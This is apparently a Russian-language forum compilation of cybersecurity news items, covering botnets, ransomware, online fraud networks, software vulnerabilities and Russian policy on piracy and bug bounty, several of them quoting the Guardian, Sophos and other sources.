В Netlab Qihoo 360 сообщают, что на пике активности ботнет заражал до 160 000 систем в день и в общей сложности успел скомпрометировать более 1 500 000 различных устройств, более половины из которых (830 000) располагались в Китае.
Теперь Mozi предрекают медленную «смерть», хотя использование DHT и P2P превращают этот процесс и очистку всех зараженных устройств в сложную задачу.
«Образцы ботнета Mozi перестали обновляться некоторое время назад, но это не означает, что угроза, исходящая от Mozi, исчезла. Поскольку части ботнета, которые уже распространены по интернету, могут продолжать заражения, новые устройства страдают каждый день. В целом мы ожидаем, что [Mozi] будет уменьшаться в размере еженедельно, но может продолжать “жить” еще долгое время, как и несколько других ботнетов, которые в прошлом были закрыты правоохранительными органами», — говорят эксперты.
Издание [The Record цитирует](https://therecord.media/mozi-botnet-authors- arrested-in-china) специалиста компании Radware Дэниела Смита, который рассказывает, что подобная ситуация наблюдается не только с Mozi. К примеру, после отключения [ботнета Hoaxcall](https://www.radware.com/security/ddos- threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/) в начале текущего года эксперты столкнулось с аналогичной технической проблемой: боты продолжали заражать новые устройство в течение нескольких месяцев после проведенной операции, действуя сами по себе.
«Я ожидаю, что Mozi тоже задержится надолго, — говорит Смит. — Поскольку Mozi представляет собой P2P-ботнет, уничтожить его одним махом невероятно сложно. Даже если авторы находятся в тюрьме, ботнет может продолжать распространять и заражать новые устройства, хотя постепенно он начнет вымирать по мере перезагрузок, обновления или замены сетевых устройств».
Новое семейство программ-вымогателей, появившееся в прошлом месяце, использует собственный набор приемов для обхода защиты с помощью новейшей техники «прерывистого шифрования».
Операторы вируса, получившего название [LockFile](https://news.sophos.com/en- us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and- evasion/), были замечены в эксплуатации недавно обнаруженных уязвимостей [ProxyShell](https://thehackernews.com/2021/08/microsoft-exchange-under- attack-with.html) и [PetitPotam](https://thehackernews.com/2021/07/new- petitpotam-ntlm-relay-attack-lets.html) с целью развертывании на серверах Windows шифрующего файлы вредоноса. Этот вирус использует особый алгоритм шифрования, скремблируя не весь файл, а только чередующие секции по 16 байтов, что дает ему возможность обходить системы защиты.
«Частичное шифрование обычно используется операторами вирусов-вымогателей для ускорения скремблирования и уже применяется группировками BlackMatter, DarkSide и LockBit 2.0, — сообщил Марк Ломан, директор инженерного департамента компании Sophos. – LockFile же выделяется среди них тем, что этот вирус не трогает первые несколько блоков документа, а шифрует последующие перемежающиеся отрезки из 16 байтов.
То есть, к примеру, текстовый документ остается частично читаемым и статистически выглядит как оригинал. Такой трюк позволяет успешно обманывать программы защиты, которые определяют наличие шифрования, используя статистический криптоанализ документов». – добавил он.
Заключение Sophos относительно LockFile строится на основе анализа артефакта, загруженного на VirusTotal 22 августа 2021 года.
После внедрения вредонос, используя интерфейс управления Windows (WMI), предпринимает шаги для завершения ключевых процессов, связанных с программами виртуализации и базами данных, после чего переходит к шифрованию основных файлов и объектов, отображая в итоге уведомление, стилистически схожее с используемым в LockBit 2.0.
Это уведомление также призывает связаться с определенным адресом электронной почты, contact@contipauper.com, что, по мнению специалистов Sophos, может быть пренебрежительным жестом в адрес конкурирующей группировки вымогателей Conti.
Более того, после успешного шифрования всех документов на устройстве вирус удаляет себя из системы, «не оставляя исполняемого файла, который бы могла обнаружить/очистить группа реагирования или антивирусное ПО».
«Для противодействующей стороны это все означает, что сфера киберугроз не стоит на месте, и злоумышленники готовы быстро воспользоваться любой представившейся уязвимостью или инструментом для проведения успешной атаки», — сказал Ломан.
Информация была обнародована в виде оперативного отчета ФБР США, раскрывающего подробности тактики новой группировки Hive, предлагающей ПО для виртуального вымогательства (RaaS). Эта группа состоит из нескольких операторов, использующих различные механизмы для взлома бизнес-сетей, кражи или шифрования их данных, после чего пытается получить выкуп в обмен на доступ к программе для дешифровки.
Российские скамерсанты оформляли микрозаймы на чужие аккаунты на Госуслугах.
В Вологодской области задержали группу кибермошенников, оформлявших микрозаймы с использованием взломанных аккаунтов на Госуслугах. Как сообщила в своем Telegram-канале официальный представитель МВД России Ирины Волк, преступления совершались в 2022-м и 2023 годах.
«Завладев персональными данными, они направляли онлайн-заявки для получения кредитов в микрофинансовые организации в разных городах России. Получив одобрение, аферисты выводили денежные средства посредством электронных кошельков и банковских карт, оформленных на третьих лиц, а затем делили их между собой», — написала Волк.
Click to expand...
По данным следствия, всего от действий преступников пострадали около 200 человек из разных регионов страны. Против членов группировки возбудили дела по ст. 159 (мошенничество) и ст. 272 (неправомерный доступ к охраняемой законом компьютерной информации) УК РФ. Фигуранты дела остались под подпиской о невыезде.
Более 800 000 человек в Европе и США, по-видимому, были обмануты, вынудив поделиться реквизитами карт и другими конфиденциальными личными данными с обширной сетью поддельных онлайн-дизайнерских магазинов, которые, по-видимому, работают из Китая.
Международное расследование The Guardian, Die Zeit и Le Monde дает редкий взгляд изнутри на механизм того, что Британский Институт чартерных стандартов торговли назвал одним из крупнейших мошенничеств такого рода, с созданием 76 000 поддельных веб-сайтов.
Множество данных, изученных журналистами и ИТ-экспертами, указывает на то, что операция хорошо организована, технически подкована - и продолжается.
Действуя в промышленных масштабах, программисты создали десятки тысяч поддельных интернет-магазинов, предлагающих товары со скидками от Dior, Nike, Lacoste, Hugo Boss, Versace и Prada, а также многих других премиальных брендов.
Опубликованные на нескольких языках - от английского до немецкого, французского, испанского, шведского и итальянского, веб-сайты, похоже, были созданы для того, чтобы заманить покупателей расстаться с деньгами и конфиденциальными личными данными.
Однако сайты не имеют никакого отношения к брендам, которые, как они утверждают, продают, и в большинстве случаев потребители, рассказавшие о своем опыте, заявили, что не получали никаких товаров.
Первые поддельные магазины в сети, похоже, были созданы в 2015 году. Согласно анализу данных, только за последние три года было обработано более 1 млн “заказов”. Не все платежи были успешно обработаны, но анализ показывает, что группа, возможно, пыталась получить до 50 млн евро (43 млн фунтов стерлингов) за этот период. Многие магазины были заброшены, но треть из них – более 22 500
На данный момент, по оценкам, 800 000 человек, почти все из них в Европе и США, имеют общие адреса электронной почты, при этом 476 000 из них поделились данными дебетовых и кредитных карт, включая их трехзначный номер безопасности. Все они также передали сети свои имена, номера телефонов, электронные и почтовые адреса.
Кэтрин Харт, ведущий сотрудник Chartered Trading Standards Institute, описала операцию как “одно из крупнейших мошеннических действий с фальшивыми онлайн- магазинами, которые я видела”. Она добавила: “Часто эти люди являются частью серьезных и организованных преступных группировок, поэтому они собирают данные и могут позже использовать их против людей, делая потребителей более восприимчивыми к попыткам фишинга”.
“Данные - это новая валюта”, - сказал Джейк Мур, консультант по глобальной кибербезопасности в компании-разработчике программного обеспечения ESET. Он предупредил, что такие хранилища персональных данных также могут быть ценны для иностранных спецслужб в целях наблюдения. “Общая картина такова, что следует предположить, что китайское правительство может иметь потенциальный доступ к данным”, - добавил он.
Существование сети поддельных магазинов было выявлено немецкой консалтинговой компанией Security Research Labs (SR Labs), которая получила несколько гигабайт данных и поделилась ими с Die Zeit.
Основная группа разработчиков, похоже, создала систему для полуавтоматического создания и запуска веб-сайтов, обеспечивающую быстрое развертывание. Похоже, что это ядро само управляло некоторыми магазинами, но позволяло другим группам использовать систему. Согласно журналам, с 2015 года к системе получили доступ по меньшей мере 210 пользователей.
Консультант SR Labs Маттиас Маркс описал модель как “франчайзинговую”. Он сказал: “Основная команда отвечает за разработку программного обеспечения, развертывание серверных систем и поддержку работы сети. Франчайзи управляют повседневной работой мошеннических магазинов.”
‘Это потрясло меня ...’
Это было за несколько недель до Рождества. 54-летняя Мелани Браун из английского графства Шропшир искала новую сумочку. Она разместила в Google изображение изделия из кожи от одного из своих любимых немецких дизайнеров Rundholz. Сразу же появился веб-сайт, предлагающий сумку со скидкой 50% от обычной розничной цены в 200 фунтов стерлингов. Она добавила это в корзину.
“Это потрясло меня”, - сказала она. Выбрав сумку, она заметила другую дизайнерскую одежду от дорогого бренда, который ей нравится, под названием Magnolia Pearl. Она нашла платья, топы и джинсы на сумму 1200 фунтов стерлингов за 15 товаров. “Я получала много за деньги, поэтому подумала, что оно того стоило”, - сказала она.
Но Брауна обманули. На протяжении почти десяти лет сеть, действующая в провинции Фуцзянь в Китае, использовала то, что кажется единой программной платформой, для создания десятков тысяч поддельных онлайн-магазинов.
Здесь есть крупные мировые бренды, такие как Paul Smith, дома высокой моды, такие как Christian Dior, но также и более нишевые, пользующиеся большим спросом имена, такие как Rixo и Stella McCartney, и уличные ритейлеры, такие как Clarks shoes. Не только одежда – существуют поддельные магазины, торгующие качественными игрушками, такими как Playmobil, и, по крайней мере, один, торгующий осветительными приборами.
В рамках этого расследования было опрошено около 49 человек, которые утверждают, что их обманули. The Guardian поговорила с 19 гражданами Великобритании и США. Их свидетельства свидетельствуют о том, что эти веб- сайты не были созданы для торговли контрафактными товарами. Большинство людей ничего не получили по почте. Некоторые получили, но товары были не те, что заказывали. Покупатель из Германии заплатил за блейзер и получил дешевые солнцезащитные очки. Британская покупательница получила поддельное кольцо Cartier вместо рубашки, а другой был отправлен небрендовый синий джемпер вместо того, за который они заплатили от Paul Smith.
Как ни странно, многие, кто пытался совершить покупки, никогда не теряли деньги. Либо их банк заблокировал платеж, либо сам фальшивый магазин его не обработал.
Однако у всех опрошенных есть одна общая черта: они передали свои личные данные.
Саймон Миллер, директор по политике и коммуникациям британской компании Stop Scams, сказал: “Данные могут быть более ценными, чем продажи. Если вы собираете данные чьей-то карты, эти данные бесценны для захвата банковского счета.”
SR Labs, которая работает с корпорациями для защиты их систем от кибератак, считает, что мошенничество действует на двух уровнях. Во-первых, использование кредитных карт, при котором поддельные платежные шлюзы собирают данные кредитных карт, но не берут никаких денег. Во-вторых, поддельные продажи, при которых преступники действительно берут деньги. Есть доказательства, что сеть принимала платежи, обработанные через PayPal, Stripe и другие платежные сервисы, а в некоторых случаях напрямую с дебетовых или кредитных карт.
Сеть использовала домены с истекшим сроком действия для размещения своих поддельных магазинов, что, по словам экспертов, может помочь избежать обнаружения веб-сайтами или владельцами брендов. Похоже, что у нее есть база данных из 2,7 млн таких потерянных доменов, и она проводит тесты, чтобы проверить, какие из них лучше всего использовать.
В Германии владелица фабрики по производству стеклянных бусин сказала, что почти каждый день получает сердитые звонки от покупателей, спрашивающих, где их одежда от Lacoste. Она узнала, что ее старый веб-сайт perlenzwoelfe.de использовался для мошенничества. Ее можно было найти, поскольку контент, который она ранее размещала по этому адресу, был виден в веб-архивах. Она сообщила о мошенничестве в полицию. “Официальные лица просто сказали, что они ничего не могут с этим поделать”.
Та же история была и с Майклом Руа, который управляет Artoyz, интернет- магазином в центре Парижа по продаже игрушек ручной работы. Был скопирован полный каталог его товаров. “Они сменили название и использовали другой домен … Они украли изображения с нашего веб-сайта и изменили цены, сделав их, конечно, намного ниже”.
Клиенты предупредили его о мошенничестве. “Обычно мы мало что можем с этим поделать". … Мы подумывали о том, чтобы обратиться к юристу, но это требует времени и денег”, - сказал он.
Сеть, похоже, возникла в провинции Фуцзянь. Многие IP-адреса (интернет- протокол) можно отследить до Китая, некоторые - до городов Путиань и Фучжоу в провинции Фуцзянь.
Документы о заработной плате, обнаруженные в данных, предполагают, что люди были наняты в качестве разработчиков и сборщиков данных и получали зарплату через китайские банки.
Также были опубликованы три шаблона для трудовых договоров, где работодатель указан как Fuzhou Zhongqing Network Technology Co Ltd.
Официально зарегистрированная в Китае и получившая официальный уникальный идентификационный номер, компания указывает свой адрес как Фучжоу, столица провинции Фуцзянь. Неясно, какое отношение она имеет к сети.
В контрактах изложены строгие условия труда. Сотруднику присваивается оценка эффективности, и он может повысить свою зарплату, получив более высокий рейтинг. О них судят по тому, воздерживаются ли они от видеоигр, просмотра фильмов или сна на работе. Если сотрудники болеют или уходят в отпуск, их зарплата снижается за пропущенные дни, если только они не работают сверхурочно.
Данные включают электронную таблицу, описывающую выплату в период с января по октябрь 2022 года дивидендов в размере 2 410 000 юаней (почти 266 000 фунтов стерлингов) по меньшей мере четырем акционерам неназванной компании.
Компания Fuzhou Zhongqing теперь размещает рекламу для разработчиков и сборщиков данных на китайских сайтах по подбору персонала. Зарплата специалиста по сбору данных составляет 4500-7000 китайских юаней (около 500-700 фунтов стерлингов) в месяц, а бизнес описывается как “внешнеторговая компания, которая в основном производит спортивную обувь, модную одежду, фирменные сумки и другие серии”.
Компания Fuzhou Zhongqing не ответила на запрос о комментариях.
Action Fraud, британский центр отчетности о киберпреступности, заявил, что будет добиваться ликвидации поддельных интернет-магазинов.
Онлайн-мошенничество становится растущей проблемой. За первые шесть месяцев 2023 года в Великобритании было зарегистрировано 77 000 случаев мошенничества с покупками, когда товары оплачиваются, но так и не материализуются, что на 43% больше по сравнению с аналогичным периодом 2022 года. В США потребители потеряли почти 8,8 млрд долларов из-за мошенничества в 2022 году, что более чем на 30% больше, чем годом ранее. Второе по распространенности мошенничество, о котором сообщают, связано с мошенничеством с покупками в Интернете.
По словам представителя TSB по борьбе с мошенничеством Мэтта Хепберна, мошенничество с покупками является “главной движущей силой” финансовых онлайн- преступлений в Великобритании. Он сказал, что технологические компании должны делать больше для защиты потребителей. “Поисковые системы и технологические платформы должны предотвращать доступ своих пользователей к поддельным сайтам и быстро удалять мошеннический контент, о котором им сообщают”.
Эстер Абрамс, менеджер по международному взаимодействию в организации отраслевого сотрудничества Stop Scams UK, сказала: “Потребители будут лучше защищены от преступных группировок, использующих цифровые системы, только в том случае, если предприятия и правительства сделают предотвращение мошенничества подлинным приоритетом. Расследования, подобные этому, показывают, насколько сильное влияние мы могли бы оказать на борьбу с мошенниками при более скоординированных международных усилиях ”.
sc: theguardian.com/money/article/2024/may/08/chinese-network-behind-one-of- worlds-largest-online-scams
примерно 16 500 защищенных шлюзов Ivanti Connect, доступных в Интернете, вероятно, уязвимы из-за ошибки удаленного выполнения кода (RCE), которую поставщик устранил ранее на этой неделе.
Уязвимость отслеживается как CVE-2024-21894 и представляет собой переполнение кучи с высокой степенью серьезности в компоненте IPSec Ivanti Connect Secure 9.x и 22.x, что потенциально позволяет пользователям, не прошедшим проверку подлинности, вызывать отказ в обслуживании (DoS) или получать RCE путем отправки специально созданных запросов. После раскрытия информации, 3 апреля 2024 года, интернет-поисковая система Shodan показала 29 000 случаев заражения через Интернет, в то время как служба мониторинга угроз Shadowserver сообщила о примерно 18 000 случаях.
В то время Ivanti заявляла, что не обнаружила признаков активного
использования ни у одного из своих клиентов, но призвала системных
администраторов установить обновления как можно скорее.
Два дня спустя Shadowserver добавил CVE-2024-21894 в свои возможности
сканирования, сообщив, что около 16 500 экземпляров уязвимы для уязвимости
RCE.
Ранее в этом году стало известно, что спонсируемые государством злоумышленники использовали многочисленные уязвимости в продуктах Ivanti, а именно CVE-2023-46805, CVE-2024-21887, CVE-2024-22024 и CVE-2024-21893, в то время как они были "нулевого дня", то есть поставщик не знал об этом. недостатков и исправлений обнаружено не было.
На удивление оперативно затушили назревающий вX скандал по поводу замеченной аномалии вSignal Messenger, которое, по мнению исследователей, может указывать на потенциальный 0-day эксплойт в стекеSignal VoIP.
Причем, по некоторым данным, с аналогичными странностями и подозрениями на 0-click через стекSignal VOIP сталкивались также пользователи изРоссии.
В свою очередь, моментально на появившиеся сообщения вX отреагировала администрация мессенджера в лице ее руководителя.
Мередит Уиттакер с уверенностью заявила, что это не атака 0-click, а всего лишь ошибка в реализации настроек конфиденциальности с привязкой номера к имени пользователя, которую разработчики скоро исправят.
Примечательно, что официальное заявление быстро растащили поX пользователи, под копирку размещая опровержения какую-либо 0-day или атаки. Затем самX присовокупил твитМередит Уиттакер к исходным сообщениям.
Что не маловажно, на момент обнаружения аномалии у автора дискуссии была установлена последняя версия iOS 17.4 и Signal 7.2, а на следующий день были выпущены версии 17.4.1 и 7.3.
Учитывая неоднозначный бэкграунд компании и ее руководителей, никакие версии исключать нельзя, особенно в контексте последовавшей реакции со стороныSignal.
Но будем посмотреть.
Депутаты направили письмо вице-премьеру РФ Дмитрию Чернышенко с предложением создать легальные российские файлообменные сервисы для размещения медиаконтента из недружественных стран.
ТАСС сообщает, что инициаторами этой идеи выступили первый зампред комитета Госдумы по просвещению Яна Лантратова и зампред комитета по экономической политике Михаил Делягин (СРЗП).
«Вниманию государственных органов заслуживает инициатива по развитию в Российской Федерации файлообменных сервисов, а также распространению с их помощью ограниченного количества нелицензированного контента от недружественных медиакорпораций, запретивших официальный выпуск своей продукции на территории нашей страны», — говорится в письме.
Click to expand...
Авторы документа отмечают, что среди попавших под санкции медиапродуктов есть произведения, которые обладают культурным значением. А значит, происходит нарушение статьи 44 Конституции РФ, согласно которой: «Каждый имеет право <…> на доступ к культурным ценностям». Депутаты подчеркивают, что задача и обязанность России — обеспечить права своих граждан на доступ к тому медиаконтенту, который имеет культурную ценность независимо от позиции иностранных правообладателей.
Также с помощью таких легальных файлообменников предлагается распространять социальную рекламу и рекламу товаров отечественных производителей. Решить вопрос о компенсации доходов российских правообладателей планируют с помощью финансовой модели, при которой деньги взимаются не с пользователей, а с рекламодателей. Также предлагается параллельно использовать платную подписку, отключающую рекламу.
«От деятельности торрентов в их нынешнем виде страдают и российские производители информационной продукции, и пользователи, которые рискуют заразить свое устройство вирусными программами, а также вынужденные сталкиваться с рекламой сомнительных фирм и услуг. <...> В нынешних условиях наиболее продуктивным решением станет развитие суверенных российских файлообменных сайтов и клиентов, в рамках функционирования которых будет осуществляться сотрудничество государства, авторов медиапродукции и российских интернет-пользователей», — гласит письмо.
Click to expand...
В марте текущего года заместитель председателя Совбеза РФ Дмитрий Медведев так же заявил, что считает правильным скачивать и распространять пиратские копии произведений, которые стали недоступны в России по решению западных правообладателей.
«Знаете, что? Ищите правильных пиратов и скачивайте у них, — заявил Медведев в интервью российским СМИ, комментируя исчезновение, в частности, некоторой западной музыки из онлайн-сервисов в РФ. — Если они ушли от нас, всякие "Нетфликсы" и прочие, значит, будем это все скачивать, будем пользоваться бесплатно. А я бы все это по сети разбрасывал, для того чтобы причинить им максимальный урон. Максимальный урон, чтобы они обанкротились!»
Click to expand...
Он отмечал, что раньше как юрист отрицательно относился к пиратству «и считал, что лучше переплатить», даже когда ему говорили, что «все есть на торрент- трекерах».
«Сейчас я к этому отношусь по принципу "что хотели, то и получили". И пусть они недобирают деньги. Мы это недавно обсуждали, что их нужно лишить части неимущественных прав, выражаясь юридическим языком, которые они имеют здесь», — резюмировал зампред Совбеза РФ.
Click to expand...
«Ведомости» узнали, что Минцифры собирается ввести bug bounty в правовое поле
Министерство цифровых технологий думает над тем, чтобы ввести в России схему Bug Bounty и легализовать выплаты белым хакерам за нахождение уязвимостей в системах.
Министерство хочет легимитизировать рынок, чтобы правоохранительные органы не могли привлекать белых хакеров к уголовной ответственности за неправомерный доступ к компьютерной информации (ст.272).
«Отсутствие понятия bug bounty на законодательном уровне создает проблему. Достаточно вспомнить про историю админа одного из операторов связи в Обнинске, который решил помочь клиентам и просканировал их сеть на уязвимости, за что его прихватили сотрудники ФСБ и сейчас судят по ст. 274.1 за неправомерное воздействие на КИИ РФ», — сообщил изданию бизнес-консультант по безопасности Алексей Лукацкий. По его словам, попытку «загнать эту тему в правовое русло» можно только приветствовать.
«Ведомости» отмечают, что введение понятия bug bounty в правое поле позволит запустить бонусную программу для тестировщиков уязвимостей в информационных государственных системах.
source: vedomosti.ru/technology/articles/2022/07/17/931742-mintsifri-belih- hakerov
В федеральной прокуратуре северного округа Калифорнии в Сан-Фрациско сообщили, что 5 мая были арестованы 32-летний Сеймур Халилов, 31-летние Рамиль Гейдаров и Оркан Алиев.
Все трое живут в городе Сан-Хосе, который при населении более миллиона человек считается политическим, финансовым и культурным центром Силиконовой Долины, и обвиняются в мошенничестве, которое грозит каждому лишением свободы сроком до 20 лет, 5 годами надзора после освобождения и штрафом до 250 тыс. долларов. В тот же день арестованных доставили в суд, где магистрат Томас Хиксон по видеосвязи ознакомил их с обвинением, которое представляют помощники окружного федерального прокурора Анкур Шингал, Соана Като и Марина Пономарчук с участием русского переводчика Марии Энтчевич. Судя по тому, что в базе данных федерального бюро тюрем Халилова, Гейдарова и Алиева нет, их под стражу не взяли, а, судя по судебным документам, освободили под залог по 50 тыс. долларов. Судя по именам и фамилиям, подсудимые азербайджанцы, а их статус в США не уточняется.
В предварительном обвинении, которое 3 мая на 37 страницах представил судье Хиксону следователь министерства внутренней безопасности (МВБ) Дэвид Мендельсон, разъясняется, что подсудимые покупали подержанные машины старых моделей с большим пробегом, скручивали показания спидометров, подделывали данные о пробеге и с приличной прибылью продавали их на сайте Craigslist. При этом подсудимые выдавали себя за владельцев автомобилей, для чего подделывали удостоверения личности жителей штата Калифорния, скрывая свои подлинные имена и фамилии. Ничего нового и оригинального в этой криминальной затее нет, но на федеральном уровне таких дел мало, а в данном случае уточняется, что с 2016 года по день ареста подсудимые продали не менее дюжины таких машин, получив минимум 300 тыс. долларов, но расследование продолжается, и оба числа могут измениться.
О себе следователь Мендельсон сообщил, что работает в МВБ с января 2019 года, а до этого два с половиной года прослужил следователем отдела регистрации автотранспорта, так сказать, ГАИ штата Калифорния. Как пояснил судье Мендельсон, купив старую машину, подсудимые приводили ее в товарный вид, для чего мыли, полировали, красили и заменяли отдельные детали, в чем, в отличие от изменений показаний спидометра, нет ничего незаконного. «Сбить» спидометр в относительно старых моделях машин можно либо перепрограммировав, либо заменив его, а с корыстной целью это уже мошенничество. Мендельсон приводит пример, как Халилов, Гейдаров и Алиев купили за 8 тыс. долларов Toyota Sequoia 2008 года с пробегом больше 168 тыс. миль, «сбили» спидометр до 54 тыс. миль и продали машину за 18 тыс. долларов. Очевидно участвуя в группе наружного наблюдения, Мендельсон в предварительном обвинении написал, что на его глазах в мае 2020 года Халилов у своего дома встретился с мужчиной, который проходит в деле как «Подозреваемй-1» (S-1), личность которого была позже установлена. S-1 принёс из своей машины красную сумку и небольшой черный портфель, с которыми сел на место водителя в Toyota 4Runner Халилова и провел там примерно 6 минут, после чего отъехал и вернулся на той же машине через 12 минут. Опять же на глазах следователя, Халилов достал бумажник и передал S-1 «что-то похожее на наличные». На основании своей подготовки и опыта, написал Дэвид Мендельсон в предварительном обвинении, он считает, что в сумке и портфеле S-1 были «инструменты для изменения показаний спидометра 4Runner, который позже был продан».
В другом случае гражданка «EF» феврале 2018 года купила и зарегистрировала на свое имя Acura MDX 2010 года с пробегом 298,415 миль. В ноябре того же года ее муж продал эту машину проживающей во Флориде гражданке «MH» и ее мужу «FL» за не уточненную сумму, но с пробегом уже 303,937 миль. Вскоре «FL» обнаружил, что в машине течет масло и решил продать ее, для чего дал объявление на сайте Craigslist и в начале декабря 2018 года продал эту Acura за 7800 долларов Рамилю Гейдарову, который выступил под подставным именем. В ноябре и декабре 2018 года Халилов поместил на сайте Craigslist шесть объявлений о продаже Acura MDX (2010 года с пробегом 35,718 миль), и 8 февраля 2019 года гражданка «LM» и ее бойфренд «JR» купили ее у Халилова за 17,500 долларов. Еще в одном случае Honda Odyssey 2011 года с пробегом больше 187 тыс. миль была продана 10 сентября 2019 года Сеймуру Халилову за 7,200 долларов, а через неделю он продал ее за 10 тыс. долларов, но уже как модель 2013 года с пробегом всего 38 тыс. миль Жертвы таких афер, пояснил следователь Мендельсон в предварительном обвинении, помимо переплаты тысяч долларов, платят тысячи долларов за ремонт таких машин, не говоря уже о риске попасть в ДТП.
Вещественными доказательствами по данному делу следователь Мендельсон, опять же на основании своей подготовки и опыта, считает «мобильники или другие электронные средства связи, наличные деньги и другие платежные инструменты, такие как ювелирные изделия, финансовые документы и документы на автомобили, ключи от автомобилей и сейфов банковских ячеек, а также поддельные или подделанные удостоверения личности». Поясню, что «поддельный» документ значит изначально созданную липу, а «подделанный» или подложный – реальный документ, в который внесены нужные исправления или дополнения. По поводу ценностей как доказательства преступной наживы, Мендельсон указал, что при аресте Рамиля Гейдарова в сентябре прошлого года на его руке были часы Rolex, которые, как следует предположить, честному человеку не по карману. Помимо этого, написал он в предварительном обвинении, из приведенных в деле разговоров подсудимых следует, что они обсуждали тысячи долларов наживы за проданные автомобили, а на полученные деньги покупали новые автомобили для продажи со сбитыми показаниями спидометра. При этом, отметил Дэвид Мендельсон, следствию не удалось выяснить место работы ни одного из подсудимых, так что «любые деньги или другие платежные инструменты, обнаруженные при обысках, могут служить доказательствами, средствами и/или результатами мошенничества, которое расследуется». От этого умозаключения, признаюсь, на меня пахнуло чем-то до боли знакомым по советской криминальной старине.
О расположенной в Калифорнии компании Craigslist в предварительном обвинении сообщается, что на своем сате в Интернете она рекламирует самые различные товары и услуги, включая покупку и продажу автомобилей, для чего от заявителя требуются его почтовый и электронный адрес. С апреля 2019 года Craigslist стал брать за такую рекламу 5 долларов и, как установило расследование по данным Craigslist, примерно с октября 2017 и до сентября 2020 года с адреса Сеймура Халилова поступило 466 объявлений о продаже машин. Также было установлено, что Рамиль Гейдаров с ноября 2017 по сентябрь 2019 года разместил на сайте Craigslist 886 объявлений о продаже машин, а Оркан Алиев с апреля 2019 по июнь 2020 года выставил 171 одно такое объявление. Следователь Мендельсон также указал, что в августе и сентябре 2020 года трое подсудимых обменивались перехваченными сообщениями, в которых обсуждали продажу за наличные машин со сбитыми показаниями спидометров. Эти разговоры велись на азербайджанском языке и для суда были переведены на английский. В одном таком разговоре Алиев сказал, что всех их арестуют одного за другим, а Гейдаров ответил, что он с этим согласен и им лучше всего скрыться, из чего следователь Дэвид Мендельсон на основании своей подготовки и опыта сделал вывод, что подсудимые могли планировать бегство из Соединенных Штатов. Про опыт Мендельсона уже известно, а специальную подготовку он объяснил дипломом юриста, полученном по окончании Университета штата Калифорния в Сан-Хосе, а также полугодовым курсом в Полицейской академии этого штата и 14 неделями спецкурсов в федеральном тренировочном центре в Брамсвике, штат Джорджия. В общем, обученный и проверенный следователь.
Значительна часть предварительного обвинения касается задействованных предполагаемыми мошенниками «электронных средств связи», а точнее, мобильников. Забегая вперед и даже оглядываясь назад, повторю, что этот вид связи при всех его несравненных достоинствах чреват излишний прозрачностью. Все, что мы говорим, пишем или передаем по айфонам и смартфонам, нам не принадлежит и при необходимости может через хранилище информации iCloud попасть, кому положено, а то и кому не положено. «Мне известно, – написал следователь Дэвид Мендельсон, – что фигуранты (target subjects) этого дела пользуются сотовыми телефонами для связи друг с другом, с теми, у кого они собираются купить машины, и с теми, кому собираются их продать. Я также знаю, что фигуранты хранят в своих мобильниках другие доказательства мошенничества, такие как снимки и паспорта (vehicle titles) машин». Далее Мендельсон поясняет, что, изъяв у подсудимых мобильники, следователи получили доступ к аудио-, фото- и видеоинформации, но доступ к ней оказался не простым, так как база данных в мобильниках, лэптопах и стационарных компьютерах может быть «заперта» для посторонних биометрическими замками.
Компания Apple предлагает замок Touch ID, открыть который можно отпечатком пальца владельца. Система мобильников Android предлагает биометрический замок Trusted Face, который открывается видом лица владельца, если поднести к нему камеру. Наконец, самый современный замок Windows Hello в нескольких мобильниках и компьютерах компании Microsoft реагирует на зрачок владельца в инфракрасном режиме, если поднести камеру не к лицу, а к глазу. С учетом этого Дэвид Мендельсон настоятельно просит судью Томаса Хиксона вместе с ордерами на арест Сеймура Халилова, Рамиля Гейдарова и Оркана Алиева обязать их открыть свои мобильники, чего никакие ордера пока не предусматривают.
Хакеры из КНДР настолько отточили свое мастерство, что страна стала одной из серьезнейших угроз в киберпространстве.
Задавленная санкциями и отрезанная от всего мира КНДР для поддержания своей экономики во многом полагается на кибератаки, считают эксперты. За последние несколько лет из надоедливого соседа Южной Кореи, специализирующегося на вымогательском ПО и DDoS-атаках, Северная Корея превратилась в настоящую грозу банков и криптовалютных бирж. По словам экспертов, опрошенных изданием The Daily Swig, северокорейские хакеры настолько отточили свои тактики и мастерство, что КНДР стала одним из серьезнейших противников в киберпространстве.
Одной из самых опасных APT-групп в мире является северокорейская Lazarus, на счету которой, помимо прочего, атака на компанию Sony Pictures в 2014 году и похищение $81 млн у Центробанка Бангладеш в 2016 году. Группировка считается одной из самых высококвалифицированных в мире благодаря эксплуатации уязвимостей нулевого дня, разработке собственных проприетарных вредоносных программ и использованию деструктивного вредоносного и вымогательского ПО для удаления или сокрытия доказательств вредоносной активности в скомпрометированных сетях.
Северокорейские хакеры постоянно совершенствуют свои методы, особенно механизмы обхода обнаружения и сохранения персистентности.
«Широкое использование упаковщиков, использование стеганографии для встраивания вредоносной нагрузки в изображения, стирание следов с устройства во время выполнения или постоянное изменение ключей/алгоритмов шифрования (даже в течение часа после обнаружения), бесфайловые атаки являются примерами таких методов обхода обнаружения», - сообщил аналитик ИБ-компании компании Malwarebytes Хоссейн Джази (Hossein Jazi).
По словам экспертов, северокорейские киберпреступники отличаются от других высококвалифицированных группировок своей безрассудностью.
«Один из факторов, делающих северокорейских киберпреступников опаснее хакеров из других стран, заключается в том, что режим Пхеньяна изолирован и отключен от мировой экономической торговли и дипломатического взаимодействия. В результате у Северной Кореи меньше стимулов к «игре по правилам», и страна продолжает переступать границы, определяющие приемлемое поведение для других государств. Это ключевая причина того, почему только северокорейские группировки осуществляют такие финансируемые государством киберпреступления, как киберограбления банков, и более склонны к развертыванию разрушительных вредоносных программ-вайперов», - пояснил специалист ИБ-компании Mandiant Фред План (Fred Plan).
Специалисты компании Trend Micro опубликовали отчет, в котором рассказывают о нескольких серьезных уязвимостях в популярнейшей Android-приложении для обмена файлами SHAREit. Это решение позволяет пользователям обмениваться файлами с друзьями или передавать файлы между личными устройствами, и согласно официальной статистике, оно было загружено более 1 000 000 000 раз.
По словам исследователей, баги в приложении могут быть использованы для запуска вредоносного кода на смартфонах пользователей. Основная проблема заключается в отсутствии надлежащих ограничений, касающихся того, кто может использовать код приложения. В сущности, вредоносные приложения, установленные на устройстве пользователя, или злоумышленники, выполняющие атаку типа man-in- the-middle, могут направлять вредоносные команды приложению SHAREit. В итоге его легитимные функции будут использованы для запуска произвольного кода, перезаписи локальных файлов или «тихой» установки сторонних приложений.
